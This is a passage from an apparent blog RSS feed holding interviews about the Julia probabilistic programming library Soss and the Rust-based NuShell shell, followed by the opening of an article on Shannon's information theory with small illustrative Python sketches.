parallel Gibbs sampling.&lt;&#x2F;p&gt;
&lt;p&gt;Based on the Passage work, Galois started getting involved with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.darpa.mil&#x2F;program&#x2F;probabilistic-programming-for-advancing-machine-Learning&quot;&gt;&lt;em&gt;Probabilistic Programming for Advancing Machine Learning (PPAML)&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;, but they needed someone to serve as technical lead. So I moved to Portland and did that for a few years. Galois is a (mostly) Haskell shop, so I was able to dig deeper into both Haskell and probabilistic programming.&lt;&#x2F;p&gt;
&lt;p&gt;Still wanting to extend some of the ideas from Passage, I moved to Seattle and spent a couple of years at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.thisismetis.com&#x2F;&quot;&gt;Metis&lt;&#x2F;a&gt; teaching data science. In my free time, I got more up to speed on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;julialang.org&#x2F;&quot;&gt;Julia&lt;&#x2F;a&gt;, and started work on what would become &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;cscherrer&#x2F;Soss.jl&quot;&gt;Soss&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;These days, I work as a Senior Research Scientist at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.relational.ai&#x2F;&quot;&gt;RelationalAI&lt;&#x2F;a&gt;. Most machine learning pipelines treat database queries and model training as entirely independent, so to go between them requires throwing away all of the structure and just joining everything.&lt;&#x2F;p&gt;
&lt;p&gt;As it turns out, that throws away some big opportunities for optimization. So our system has an expressive language for reasoning about relational structure, and works in terms that make these optimizations natural for machine learning and probabilistic programming.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-probabilistic-programming-how-does-it-differ-from-other-forms-of-programming&quot;&gt;What is probabilistic programming? How does it differ from other forms of programming?&lt;&#x2F;h4&gt;
&lt;p&gt;When people talk about &lt;em&gt;Probabilistic Programming Languages&lt;&#x2F;em&gt; (PPLs), they usually mean a system for building and reasoning about Bayesian models. Maybe the simplest way to think about this is as a way of reasoning about simulations. Say you have a simulation that you can run to make a simulated “world”. Every part of the simulation has some randomness. This includes the things you can actually observe, but also the underlying choices the simulator made for things that affect those observations. But those are random too, so they might depend on &lt;em&gt;other&lt;&#x2F;em&gt; random choices.&lt;&#x2F;p&gt;
&lt;p&gt;Ok, so choices made along the way will affect the distribution of things downstream. But we can also use this to reason the other way! We observe some data, and ask “what choices along the way could have led to this?”&lt;&#x2F;p&gt;
&lt;p&gt;In the simplest case, say we have a simulation for biased coin flips where we pick a random probability of heads, say &lt;code&gt;p ~ Uniform(0,1)&lt;&#x2F;code&gt;, and simulate 20 flips. Then we observe 15 heads and 5 tails. We can’t say for certain what &lt;code&gt;p&lt;&#x2F;code&gt; was, but we can find a distribution that’s updated based on the observed data.&lt;&#x2F;p&gt;
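The biased-coin update described above can be sketched in a few lines of plain Python (not Soss or Julia): a Uniform(0,1) prior on the probability of heads is a Beta(1,1) distribution, and by Beta-Binomial conjugacy, observing 15 heads in 20 flips yields a Beta(16, 6) posterior. The variable names here are illustrative only.

```python
# Bayesian update for the biased-coin example: a Uniform(0,1) prior on p
# is Beta(1,1); observing k heads in n flips gives a Beta(a+k, b+n-k)
# posterior by Beta-Binomial conjugacy.
a, b = 1, 1        # Beta(1,1) == Uniform(0,1) prior
k, n = 15, 20      # observed: 15 heads out of 20 flips

a_post, b_post = a + k, b + (n - k)          # posterior: Beta(16, 6)
posterior_mean = a_post / (a_post + b_post)  # 16/22, about 0.727

print(a_post, b_post, round(posterior_mean, 3))  # → 16 6 0.727
```

The posterior mean (about 0.73) sits between the raw frequency 15/20 = 0.75 and the prior mean 0.5, which is exactly the "updated distribution" intuition from the paragraph above.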
&lt;h4 id=&quot;how-did-you-get-into-julia-why-choose-julia-over-python-or-r&quot;&gt;How did you get into Julia? Why choose Julia over Python or R?&lt;&#x2F;h4&gt;
&lt;p&gt;I want to be able to express ideas at a high level of abstraction without sacrificing performance. I’ve used Python and R quite a bit, but for the things I wanted to do I always felt constrained, because getting performance always means pushing things to another language. Then there are concerns with the cost of crossing that language barrier, both in a human and a computational sense.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-soss-how-did-it-come-about-and-what-was-the-motivation-behind-it&quot;&gt;What is Soss? How did it come about and what was the motivation behind it?&lt;&#x2F;h4&gt;
&lt;p&gt;Soss is a Julia-based PPL that represents the right-hand side of each assignment (&lt;code&gt;=&lt;&#x2F;code&gt;) and sample (&lt;code&gt;~&lt;&#x2F;code&gt;) as an AST. The nice thing about this is that it gives ultimate flexibility in what a model can do. For example, we have inference methods that take a &lt;code&gt;Model&lt;&#x2F;code&gt; and return an &lt;code&gt;AST&lt;&#x2F;code&gt; that generates code at run-time, but we also have model transformation functions that return another model. Models are first-class, and can be used inside other models, etc.&lt;&#x2F;p&gt;
&lt;p&gt;There are some other things too, for example we have an interface to SymPy so you can easily get to a symbolic representation of the log-density. Simplifications here can lead to faster code, so we also have a way to generate SSA Julia code from this. There’s still plenty more speed to be had, but I’ve seen 100x-1000x speedup with this vs a direct implementation.&lt;&#x2F;p&gt;
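Soss’s actual SymPy bridge lives on the Julia side, but the payoff of simplifying a log-density can be illustrated with plain Python: taking the log of a Normal pdf directly does an exp followed by a log, while the symbolically simplified form collapses to a cheap sum, which is also stabler far out in the tails. The function names below are invented for illustration and are not Soss API.

```python
import math

# Naive log-density: evaluate the Normal(mu, sigma) pdf, then take its log.
def logpdf_direct(x, mu, sigma):
    pdf = math.exp(-(x - mu) ** 2 / (2 * sigma ** 2)) / (sigma * math.sqrt(2 * math.pi))
    return math.log(pdf)

# Simplified log-density: the exp/log pair cancels symbolically, leaving
# a sum of cheap terms -- the kind of win a symbolic pass can deliver.
def logpdf_simplified(x, mu, sigma):
    return -(x - mu) ** 2 / (2 * sigma ** 2) - math.log(sigma) - 0.5 * math.log(2 * math.pi)

print(logpdf_direct(1.5, 0.0, 1.0))      # ≈ -2.0439
print(logpdf_simplified(1.5, 0.0, 1.0))  # same value, no exp/log round trip
# At x = 40.0 the direct version fails: exp(-800) underflows to 0.0 and
# log(0) raises, while the simplified form still returns -800.919...
print(logpdf_simplified(40.0, 0.0, 1.0))
```

The 100x–1000x speedups mentioned above come from far larger simplifications over whole model log-densities, but the mechanism is the same: cancel and collapse symbolically, then generate straight-line numeric code.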
&lt;p&gt;I’ve wanted to build Soss for a long time; it was just a matter of finding a language with metaprogramming support that could handle the syntax I wanted, while also having the speed and a good numerically-oriented ecosystem.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-does-the-probabilistic-programming-ecosystem-in-julia-compare-to-the-ones-in-python-r-in-particular-how-does-soss-compare-to-pymc3&quot;&gt;How does the probabilistic programming ecosystem in Julia compare to the ones in Python&#x2F;R? In particular, how does Soss compare to PyMC3?&lt;&#x2F;h4&gt;
&lt;p&gt;To get speed, both Python and R have to call to other languages. I’ve spent a lot of time using PyMC3, and I really like it. But it still requires keeping in your head which lines of code are talking to Python, vs which are talking to Theano. There’s a language barrier to play across, and losing track of it tends to break things.&lt;&#x2F;p&gt;
&lt;p&gt;When you write a Soss model, it’s all Julia. You can use Julia functions freely. Even if you want to do Soss development (please do!), it’s still all Julia.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;on-that-note-who-is-the-end-user-for-the-library-is-it-mostly-just-used-in-academic-settings-or-are-there-industry-uses-as-well&quot;&gt;On that note, who is the end user for the library, is it mostly just used in academic settings or are there industry uses as well?&lt;&#x2F;h4&gt;
&lt;p&gt;It’s certainly intended for both. One thing I like about the AST approach is that generated code can be as fast as you can make it.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-were-the-biggest-challenges-in-developing-probabilistic-programming-for-a-new-language&quot;&gt;What were the biggest challenges in developing probabilistic programming for a new language?&lt;&#x2F;h4&gt;
&lt;p&gt;There’s always some overhead in learning a new programming language. Julia has a very Python-like syntax, so learning the basics was very fast. But metaprogramming requires different ways of thinking about things, so that took a lot of spinning up.&lt;&#x2F;p&gt;
&lt;p&gt;Macros weren’t enough, we had to use Julia’s &lt;code&gt;@generated&lt;&#x2F;code&gt; functions, which let you do staged programming. Even with this, the types weren’t quite working out, so I was using &lt;code&gt;eval&lt;&#x2F;code&gt; all over the place, which does evaluation in global scope and can cause some problems.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;thautwarm.github.io&#x2F;Site-32&#x2F;index.html&quot;&gt;Taine Zhao&lt;&#x2F;a&gt; got us out of the rut with some great Julia packages like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;thautwarm&#x2F;GeneralizedGenerated.jl&quot;&gt;GeneralizedGenerated.jl&lt;&#x2F;a&gt;. Generated functions compile new code for each new type they’re evaluated on, so she realized the model’s type could contain a representation of the entire model. It’s a clever solution, and helped a lot of other parts of the design to fall into place.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;there-seems-to-be-an-explosion-in-probabilistic-programming-on-julia-with-other-libraries-like-turing-or-gen-how-does-soss-compare-to-them&quot;&gt;There seems to be an explosion in probabilistic programming on Julia with other libraries like Turing or Gen, how does Soss compare to them?&lt;&#x2F;h4&gt;
&lt;p&gt;I’d say the syntax is closer to Turing, but the semantics are closer to Gen.&lt;&#x2F;p&gt;
&lt;p&gt;The Gen team independently came up with the same approach we’re using of representing a model as a function. In most PPLs, the model includes some indication of which data will later be observed. But leaving this out until inference time makes it much easier to compose models in different ways.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;any-books-you-recommend-reading-on-the-topic-besides-the-classics-statistical-rethinking-and-bayesian-methods-for-hackers&quot;&gt;Any books you recommend reading on the topic, besides the classics Statistical Rethinking and Bayesian Methods for Hackers?&lt;&#x2F;h4&gt;
&lt;p&gt;Both of these are great. If you’re interested in a particular system, most of the well-funded ones have a nice collection of examples and tutorials; walking through those usually helps.&lt;&#x2F;p&gt;
&lt;p&gt;If you want a broader and deeper view, I’d suggest digging into Bayesian analysis directly. One of my favorites is David MacKay’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.inference.org.uk&#x2F;mackay&#x2F;itila&#x2F;&quot;&gt;Information Theory, Inference, and Learning Algorithms&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-s-next-for-soss&quot;&gt;What’s next for Soss?&lt;&#x2F;h4&gt;
&lt;p&gt;There’s always more to do. Currently we’re starting work to make the documentation better. I think we need lots more examples, tutorials, and comparisons to other systems.&lt;&#x2F;p&gt;
&lt;p&gt;If you have any questions about Soss, the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;discourse.julialang.org&#x2F;&quot;&gt;Julia Discourse&lt;&#x2F;a&gt; or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;julialang.zulipchat.com&quot;&gt;Zulip&lt;&#x2F;a&gt; are both great. And of course, there’s always GitHub issues for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;cscherrer&#x2F;Soss.jl&quot;&gt;the Soss repo&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>NuShell: the shell where traditional Unix meets modern development, written in Rust</title>
          <pubDate>Thu, 14 May 2020 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/nushell-the-shell-where-traditional-unix-meets-modern-development-written-in-rust/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/nushell-the-shell-where-traditional-unix-meets-modern-development-written-in-rust/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/nushell-the-shell-where-traditional-unix-meets-modern-development-written-in-rust/">&lt;h4 id=&quot;we-interviewed-its-creators&quot;&gt;We interviewed its creators&lt;&#x2F;h4&gt;
&lt;p&gt;Shells have been around forever and, for better or for worse, haven’t changed much since their inception. Until &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.nushell.sh&#x2F;&quot;&gt;NuShell&lt;&#x2F;a&gt; appeared to reinvent shells and defy our muscle memory. It brought some big changes, which include rethinking how pipelines work, structured input&#x2F;output, and plugins.&lt;&#x2F;p&gt;
&lt;p&gt;We wanted to learn more about NuShell so we interviewed both of its creators: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;jntrnr&quot;&gt;Jonathan Turner&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;wycats&quot;&gt;Yehuda Katz&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;why-create-nushell-is-it-me-or-does-it-have-a-next-level-awk-vibe&quot;&gt;&lt;strong&gt;Why create NuShell? Is it me or does it have a next-level AWK vibe?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;strong&gt;Jonathan Turner&lt;&#x2F;strong&gt; : Sometimes the simplest ideas are the ones that hook you the most :). When Yehuda and I first started discussing how shells could be improved, we settled on the idea of using structured data rather than just text between applications (for example stdin&#x2F;stdout). He had just been experimenting with PowerShell and saw how adding some structure to the data opened up a lot of possibilities.&lt;&#x2F;p&gt;
&lt;p&gt;The basic idea is pretty simple: Nu opens everything into a table you can work with. Files, streams, commands like ls and ps all output this one table format. Then you have a set of commands that work with these tables, to help you get the data you want, change it, view it, etc.&lt;&#x2F;p&gt;
&lt;p&gt;Funny that you mention “awk”. In a way, Nu is a way of saying “what if we didn’t need tools like awk so often?” Since you’re working with structured data, as we add more support for file types, it’s less often you need to reach for “awk”, “jq”, “grep”, and the array of other tools to open and work with common file types.&lt;&#x2F;p&gt;
&lt;p&gt;In a way, it’s taking the original spirit of Unix — where you use pipelines to combine a set of tools — and imagining how that original spirit would work today, with what we know about programming languages and tools. And, being cross-platform, it’s nice to learn this approach and then be able to easily switch operating systems and use the same techniques.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-u77ccTVL0VJ7Cw2xT_7puA.png&quot; alt=&quot;&quot; &#x2F;&gt;NuShell screen capture&lt;&#x2F;p&gt;
&lt;h4 id=&quot;why-use-rust-how-much-experience-did-you-have-beforehand&quot;&gt;&lt;strong&gt;Why use Rust? How much experience did you have beforehand?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;strong&gt;Jonathan&lt;&#x2F;strong&gt; : Yehuda and I have been writing Rust for at least 4 years. He was one of the first people to deploy Rust into production, long before it hit 1.0.&lt;&#x2F;p&gt;
&lt;p&gt;Rust also just made sense. It’s naturally cross-platform, easy to optimize, and easy to harden against memory and threading issues, and after the initial learning curve it’s also quite a lot of fun to write. When you’re doing things in your free time, having something you’re looking forward to hacking on after work makes it a lot easier to do so day after day.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;did-using-rust-present-a-challenge-in-some-aspect&quot;&gt;&lt;strong&gt;Did using Rust present a challenge in some aspect?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;strong&gt;Yehuda Katz&lt;&#x2F;strong&gt; : Quite the opposite! Rust and its ecosystem have two properties that are a really good fit for what we’re trying to do:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Cross-platform: There is a version of almost every basic crate that works on Windows, macOS, and Linux.&lt;&#x2F;li&gt;
&lt;li&gt;Rigorous: Rust doesn’t really have exceptions. Instead, Rust’s library ecosystem surfaces edge-cases as Results. When writing something like a shell, this saved us from all kinds of problems as we evolved.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;Rust also has a great package manager (Cargo), which means that gluing together fast, cross-platform, and rigorous packages from the ecosystem is really easy.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-do-you-go-about-making-software-cross-platform-in-rust-is-it-as-much-work-as-one-would-think&quot;&gt;&lt;strong&gt;How do you go about making software cross-platform in Rust? Is it as much work as one would think?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;strong&gt;Yehuda&lt;&#x2F;strong&gt; : Not really. What you do is look for crates on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;crates.io&#x2F;&quot;&gt;crates.io&lt;&#x2F;a&gt; that support Windows. Most of the time, crates that claim to care about Windows support Windows, as well as other platforms.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Jonathan&lt;&#x2F;strong&gt; : Rust is definitely my preferred tool for cross-platform development these days. Like Yehuda mentions, most crates work across Windows, macOS, and Linux. We’ll also likely explore making Nu work in the browser in the future, which would mean WASM support, and Rust is probably the best language for that as well.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;why-did-you-decide-to-ignore-posix-compliance&quot;&gt;&lt;strong&gt;Why did you decide to ignore POSIX-compliance?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;strong&gt;Yehuda&lt;&#x2F;strong&gt; : This question is a little bit misleading in my opinion. When people say that a shell is “POSIX compliant”, they’re talking about a tiny subset of the syntax and features that people come to rely on in a shell. If you want to run a POSIX shell script in nu, you can just run it with bash or sh. On the other hand, trying to make our syntax perfectly compliant with the POSIX standard would introduce all kinds of weird decades-old cruft and constrain the ergonomics of our syntax.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Jonathan&lt;&#x2F;strong&gt; : When people ask for POSIX-compliance, I think different people mean different things. Generally, I think they mean “don’t break my muscle memory”. That’s fair, it’s annoying to unlearn habits. That said, what it means to be compatible has changed a lot from the original ideas. I saw this tweet the other day which I thought sums it up pretty well:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-gQH1jV4nzbs_WurExrLnEw.png&quot; alt=&quot;&quot; &#x2F;&gt;Source: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;danluu&#x2F;status&#x2F;1234814736144797697&quot;&gt;Dan Luu&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;where-does-nushell-stand-compared-to-others-like-zsh-or-fish-as-of-today-can-i-set-it-as-my-default-shell&quot;&gt;&lt;strong&gt;Where does NuShell stand compared to others like zsh or fish? As of today, can I set it as my default shell?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;strong&gt;Jonathan&lt;&#x2F;strong&gt; : We’re quickly approaching the point where you’ll be able to use Nu as your default shell. In fact, some of Nu’s users already happily use it as their daily driver. In 0.13, we added the ability to create your own aliases, which dramatically improves how well Nu works as a shell, as it’s now easy to configure your own set of shortcuts for things you do regularly.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-did-you-decide-on-that-sort-of-hard-division-of-commands-streamers-filters-and-consumers-i-didn-t-see-any-official-names-for-these-concepts-but-i-think-this-conveys-the-idea&quot;&gt;&lt;strong&gt;How did you decide on that sort of “hard” division of commands: streamers, filters, and consumers? &lt;em&gt;I didn’t see any official names for these concepts, but I think this conveys the idea&lt;&#x2F;em&gt;&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;strong&gt;Yehuda&lt;&#x2F;strong&gt; : The distinctions arose organically, and make sense. When you think about streams, there are really three parts: the first part, the middle parts, and the last part. The last part is the most special one, because it takes a stream of data and turns it into something you can see, which requires looking at the inbound stream. For example, the outputted table needs to look at some rows to see what headers to use.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;why-make-a-plugin-system-what-are-the-benefits-of-using-json-rpc-for-internal-communication&quot;&gt;&lt;strong&gt;Why make a plugin system? What are the benefits of using JSON-RPC for internal communication?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;strong&gt;Yehuda&lt;&#x2F;strong&gt; : The main difference between plugins and builtins is that built-in commands have access to the shell internals. We wanted to build as many commands as possible on top of a more well-defined interface. This also meant that you could build custom commands in Python, Ruby or JavaScript pretty early in the project.&lt;&#x2F;p&gt;
&lt;p&gt;The benefit of JSON-RPC is that it’s pretty easy to work with JSON-RPC in virtually all programming languages, so it’s possible to build a plugin in any language without major assistance from the nushell team.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;why-would-i-choose-to-make-a-plugin-why-not-just-make-a-binary-that-works-on-all-shells-and-let-the-parsing-of-my-output-to-users-of-nushell&quot;&gt;&lt;strong&gt;Why would I choose to make a plugin? Why not just make a binary that works on all shells and leave the parsing of my output to users of NuShell?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;strong&gt;Yehuda&lt;&#x2F;strong&gt; : The major benefit of building a plugin is the ability to work directly with structured data. This means that all of the “good stuff” that nushell gives you out of the box, like sorting and filtering, will just work without your user having to parse string output into a new structured format.&lt;&#x2F;p&gt;
&lt;p&gt;The Nushell plugin API also allows you to specify the types of your arguments, which will give you error messages, syntax highlighting and some amount of context-sensitive completion out of the box. The more information you give Nushell, the more we can give Nushell users useful information as they interact with your command.&lt;&#x2F;p&gt;
&lt;p&gt;The Nushell plugin API is also built for streaming out of the box, so if you use it in the normal way, you can idiomatically interact with streams of structured data in a way that will scale up to huge amounts of input without “breaking the stream”.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-s-next-for-nushell&quot;&gt;&lt;strong&gt;What’s next for NuShell?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;strong&gt;Jonathan&lt;&#x2F;strong&gt; : Nu, as both a shell and a language, is still very much young and growing. We’re planning on adding functions, a rich auto-completion system, better Jupyter integration for working with data, per-directory environments, and much more. In short, we want it to grow to be the best tool for working with your system, files, and data we can make.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>A brief introduction to the beauty of Information Theory</title>
          <pubDate>Wed, 06 May 2020 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/a-brief-introduction-to-the-beauty-of-information-theory/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/a-brief-introduction-to-the-beauty-of-information-theory/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/a-brief-introduction-to-the-beauty-of-information-theory/">&lt;h4 id=&quot;or-how-to-be-a-hardcore-guess-who-gamer&quot;&gt;Or how to be a hardcore Guess Who gamer&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;em&gt;Authors: Juan Pablo Amoroso, Javier Rodríguez Chatruc, Camilo Plata, and Federico Carrone.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;The fundamental problem of communication is that of reproducing at one point either exactly or approximately a message selected at another point.&lt;br &#x2F;&gt;
— Claude Shannon, 1948&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Imagine you were tasked with designing a communications system between a space station and a ground control headquarters back on Earth. The system would transmit and receive messages encoded in binary, that is, as a sequence of 1s and 0s. As the message travels, there may be interference from other radio signals, so that what is picked up in ground control is not exactly the same as the original message. Under these circumstances, is it possible to devise a scheme that allows reliable communication?&lt;&#x2F;p&gt;
&lt;p&gt;A simple workaround would be to add redundancy: send each bit a number of times, let’s say 5:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;11111&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;00000&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;…&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If ground control receives the message &lt;em&gt;11101&lt;&#x2F;em&gt; , they could be fairly certain that what was truly sent was &lt;em&gt;11111&lt;&#x2F;em&gt;. Although this simple system would work (up to a point), we can see that it is very wasteful: we have to send 4 extra bits for every bit in the original message. The &lt;em&gt;transmission rate&lt;&#x2F;em&gt; is therefore only 20%. Can we do any better?&lt;&#x2F;p&gt;
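That majority-vote decoding rule can be sketched in a few lines of Python (a toy illustration, not code from the original article):

```python
def encode(bits, repeat=5):
    """Repetition code: send each bit `repeat` times."""
    return "".join(b * repeat for b in bits)

def decode(received, repeat=5):
    """Majority-vote each block of `repeat` received bits."""
    decoded = []
    for i in range(0, len(received), repeat):
        block = received[i:i + repeat]
        decoded.append("1" if block.count("1") > repeat // 2 else "0")
    return "".join(decoded)

# A noisy block like "11101" still decodes to the intended bit "1".
```

With five copies per bit the code survives up to two flipped bits per block, but the rate is only 1/5 = 20%, as noted above.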
&lt;p&gt;There seems to be a dilemma here: if we want accuracy, we must lower the rate of transmission.&lt;&#x2F;p&gt;
&lt;p&gt;This is the problem Claude Shannon tackled in his 1948 paper &lt;em&gt;A Mathematical Theory of Communication&lt;&#x2F;em&gt;. In it, he proved that there is a limit for the rate of information that can be reliably transmitted over a noisy channel (the &lt;em&gt;Shannon limit&lt;&#x2F;em&gt;). However, below this limit we can transmit information with an increasingly small error. This important result tells us that there &lt;em&gt;exists&lt;&#x2F;em&gt; a code that allows arbitrary accuracy over a given comunication channel, but it does not tell us how to build it.&lt;&#x2F;p&gt;
&lt;p&gt;More precisely, suppose a channel has a probability &lt;em&gt;p&lt;&#x2F;em&gt; of transmitting a bit correctly, and a corresponding probability of 1 − &lt;em&gt;p&lt;&#x2F;em&gt; of sending the wrong bit. Shannon proved that the optimum rate of transmission is:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-kCNAUFlhWJv1kUzKatqINA.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-TgCse1znfuWYULYwXeo4Aw.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The plot is symmetrical around &lt;em&gt;p = 0.5&lt;&#x2F;em&gt;, with maxima at &lt;em&gt;p = 0&lt;&#x2F;em&gt; and &lt;em&gt;p = 1&lt;&#x2F;em&gt;. The case of &lt;em&gt;p = 0&lt;&#x2F;em&gt; is interesting: the channel has perfect noise and flips all the bits in the original message. But if we know that, the message is trivially deciphered: we just flip the bits back.&lt;&#x2F;p&gt;
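This curve is the standard capacity C(p) = 1 − H(p) of a binary symmetric channel, where H is the binary entropy; a quick numerical check (a sketch, not code from the article):

```python
import math

def binary_entropy(p):
    """H(p) = -p*log2(p) - (1-p)*log2(1-p), with H(0) = H(1) = 0."""
    if p in (0.0, 1.0):
        return 0.0
    return -p * math.log2(p) - (1 - p) * math.log2(1 - p)

def capacity(p):
    """Optimum rate when a bit arrives correctly with probability p."""
    return 1.0 - binary_entropy(p)

# capacity(0.5) == 0: pure noise, nothing reliable gets through.
# capacity(0.0) == capacity(1.0) == 1: a channel that flips every
# bit is just as good as a perfect one, once you know it does so.
```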
&lt;p&gt;The formula is commonly stated in terms of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Entropy_%28information_theory%29&quot;&gt;information entropy&lt;&#x2F;a&gt;, a measure Shannon devised that can be interpreted as the level of ‘uncertainty’ or ‘surprise’ associated with the channel.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-fCyO-nZidJEiOqwqDGWJ3g.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-s0z3MUCTtJvh_AsvxGg72g.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We can see that the entropy has a maximum at 1 when &lt;em&gt;p&lt;&#x2F;em&gt; = ½, and minima at 0 for &lt;em&gt;p =&lt;&#x2F;em&gt; 0 and &lt;em&gt;p =&lt;&#x2F;em&gt; 1.&lt;&#x2F;p&gt;
&lt;p&gt;More generally, given a random message &lt;em&gt;M&lt;&#x2F;em&gt; that can take &lt;em&gt;n&lt;&#x2F;em&gt; different values with probability &lt;em&gt;pᵢ&lt;&#x2F;em&gt; for &lt;em&gt;i =&lt;&#x2F;em&gt; 1,…,&lt;em&gt;n&lt;&#x2F;em&gt; , we define the entropy of the message as:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-ezweLprVK1INseQwDCN2yg.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
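In code, this definition (with logarithms base 2, giving bits) is simply (a minimal sketch):

```python
import math

def entropy(probs):
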